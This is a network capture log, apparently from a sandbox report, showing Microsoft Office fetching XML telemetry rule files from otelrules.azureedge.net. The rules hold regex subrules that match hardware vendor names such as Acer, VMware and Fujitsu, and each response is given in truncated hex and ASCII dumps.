2024-11-02 16:56:26 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 02 Nov 2024 16:56:26 GMT Content-Type: text/xml Content-Length: 407 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:41 GMT ETag: "0x8DC582B9698189B" x-ms-request-id: cf92f9cd-d01e-00ad-1a55-2be942000000 x-ms-version: 2018-03-28 x-azure-ref: 20241102T165626Z-176bd8f9bc5pqws8hC1DFW15kc00000001y000000000fs7a x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-02 16:56:26 UTC	407	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 43 63 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120619" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <SR T="2" R="([Aa][Cc][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">

Session ID	Source IP	Source Port	Destination IP	Destination Port
16	192.168.2.7	49716	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-02 16:56:26 UTC	192	OUT	GET /rules/rule120620v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-02 16:56:26 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 02 Nov 2024 16:56:26 GMT Content-Type: text/xml Content-Length: 469 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT ETag: "0x8DC582BBA701121" x-ms-request-id: 6df06080-e01e-001f-1d30-2c1633000000 x-ms-version: 2018-03-28 x-azure-ref: 20241102T165626Z-r159446fcd7rz5kshC1DFW2xxw00000001mg000000009g3c x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-02 16:56:26 UTC	469	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120620" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
17	192.168.2.7	49717	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-02 16:56:27 UTC	192	OUT	GET /rules/rule120621v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-02 16:56:27 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 02 Nov 2024 16:56:27 GMT Content-Type: text/xml Content-Length: 415 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT ETag: "0x8DC582BA41997E3" x-ms-request-id: 57f0feec-701e-0098-6847-2c395f000000 x-ms-version: 2018-03-28 x-azure-ref: 20241102T165627Z-176bd8f9bc57kbmchC1DFWctms00000002m0000000009b80 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-02 16:56:27 UTC	415	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 56 76 5d 5b 4d 6d 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120621" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <SR T="2" R="([Vv][Mm][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru

Session ID	Source IP	Source Port	Destination IP	Destination Port
18	192.168.2.7	49719	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-02 16:56:27 UTC	192	OUT	GET /rules/rule120623v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-02 16:56:27 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 02 Nov 2024 16:56:27 GMT Content-Type: text/xml Content-Length: 464 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT ETag: "0x8DC582B97FB6C3C" x-ms-request-id: 0a26527a-001e-000b-1b0a-2c15a7000000 x-ms-version: 2018-03-28 x-azure-ref: 20241102T165627Z-176bd8f9bc5qpx4shC1DFW30sn000000022g00000000dpe3 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-02 16:56:27 UTC	464	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 49 69 5d 5b 47 67 5d 5b 41 61 5d 5b 42 62 5d 5b 59 79 5d 5b 54 74 5d 5b 45 65 5d 20 5b 54 74 5d 5b 45 65 5d 5b 43 63 5d 5b 48 68 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 47 67 5d 5b 59 79 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120623" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <SR T="2" R="([Gg][Ii][Gg][Aa][Bb][Yy][Tt][Ee] [Tt][Ee][Cc][Hh][Nn][Oo][Ll][Oo][Gg][Yy])"> <S T="1" F="1" M="Ignor

Session ID	Source IP	Source Port	Destination IP	Destination Port
19	192.168.2.7	49718	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-02 16:56:27 UTC	192	OUT	GET /rules/rule120622v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-02 16:56:27 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 02 Nov 2024 16:56:27 GMT Content-Type: text/xml Content-Length: 477 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT ETag: "0x8DC582BB8CEAC16" x-ms-request-id: 6bd3c087-001e-000b-13fd-2c15a7000000 x-ms-version: 2018-03-28 x-azure-ref: 20241102T165627Z-16547b76f7f7jnp2hC1DFWfc300000000120000000000nn4 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-02 16:56:27 UTC	477	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120622" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
20	192.168.2.7	49720	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-02 16:56:27 UTC	192	OUT	GET /rules/rule120624v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-02 16:56:27 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 02 Nov 2024 16:56:27 GMT Content-Type: text/xml Content-Length: 494 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT ETag: "0x8DC582BB7010D66" x-ms-request-id: 7f7db364-701e-005c-2f05-2dbb94000000 x-ms-version: 2018-03-28 x-azure-ref: 20241102T165627Z-16547b76f7f7scqbhC1DFW0m5w00000000qg00000000ggw3 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-02 16:56:27 UTC	494	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120624" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
21	192.168.2.7	49721	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-02 16:56:27 UTC	192	OUT	GET /rules/rule120625v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-02 16:56:27 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 02 Nov 2024 16:56:27 GMT Content-Type: text/xml Content-Length: 419 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:42 GMT ETag: "0x8DC582B9748630E" x-ms-request-id: c6a9065a-701e-0050-010c-2c6767000000 x-ms-version: 2018-03-28 x-azure-ref: 20241102T165627Z-176bd8f9bc5fvjnbhC1DFW9ez800000002c0000000006yn4 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-02 16:56:27 UTC	419	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 46 66 5d 5b 55 75 5d 5b 4a 6a 5d 5b 49 69 5d 5b 54 74 5d 5b 53 73 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120625" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <SR T="2" R="([Ff][Uu][Jj][Ii][Tt][Ss][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=

Session ID	Source IP	Source Port	Destination IP	Destination Port
22	192.168.2.7	49722	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-02 16:56:28 UTC	192	OUT	GET /rules/rule120626v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-02 16:56:28 UTC	491	IN	HTTP/1.1 200 OK Date: Sat, 02 Nov 2024 16:56:28 GMT Content-Type: text/xml Content-Length: 472 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT ETag: "0x8DC582B9DACDF62" x-ms-request-id: 764b7f95-c01e-00a1-1c00-2d7e4a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241102T165628Z-16547b76f7f67wxlhC1DFWah9w00000000xg000000007h7w x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-02 16:56:28 UTC	472	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120626" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
23	192.168.2.7	49726	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-02 16:56:28 UTC	192	OUT	GET /rules/rule120630v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-02 16:56:29 UTC	491	IN	HTTP/1.1 200 OK Date: Sat, 02 Nov 2024 16:56:28 GMT Content-Type: text/xml Content-Length: 499 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:45 GMT ETag: "0x8DC582B98CEC9F6" x-ms-request-id: 8e718dad-301e-0051-6df1-2c38bb000000 x-ms-version: 2018-03-28 x-azure-ref: 20241102T165628Z-16547b76f7fr28cchC1DFWnuws00000000wg00000000rxkc x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-02 16:56:29 UTC	499	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120630" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
24	192.168.2.7	49725	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-02 16:56:28 UTC	192	OUT	GET /rules/rule120629v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-02 16:56:29 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 02 Nov 2024 16:56:28 GMT Content-Type: text/xml Content-Length: 428 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT ETag: "0x8DC582BAC4F34CA" x-ms-request-id: 9f11ee7d-201e-0096-73f2-2cace6000000 x-ms-version: 2018-03-28 x-azure-ref: 20241102T165628Z-16547b76f7fxdzxghC1DFWmf7n000000010000000000dn58 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-02 16:56:29 UTC	428	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 2d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120629" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo]-[Ss][Tt][Aa][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"

Session ID	Source IP	Source Port	Destination IP	Destination Port
25	192.168.2.7	49724	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-02 16:56:28 UTC	192	OUT	GET /rules/rule120628v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-02 16:56:29 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 02 Nov 2024 16:56:29 GMT Content-Type: text/xml Content-Length: 468 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT ETag: "0x8DC582B9C8E04C8" x-ms-request-id: 394ba139-301e-006e-4928-2cf018000000 x-ms-version: 2018-03-28 x-azure-ref: 20241102T165629Z-176bd8f9bc5qpx4shC1DFW30sn00000002a0000000000ch1 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-02 16:56:29 UTC	468	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120628" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
26	192.168.2.7	49723	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-02 16:56:29 UTC	192	OUT	GET /rules/rule120627v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-02 16:56:29 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 02 Nov 2024 16:56:29 GMT Content-Type: text/xml Content-Length: 404 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:54 GMT ETag: "0x8DC582B9E8EE0F3" x-ms-request-id: e5bf7d34-e01e-00aa-152e-2cceda000000 x-ms-version: 2018-03-28 x-azure-ref: 20241102T165629Z-176bd8f9bc5dfnrlhC1DFW9ueg00000002qg00000000594k x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-02 16:56:29 UTC	404	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4e 6e 5d 5b 45 65 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120627" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <SR T="2" R="^([Nn][Ee][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S

Session ID	Source IP	Source Port	Destination IP	Destination Port
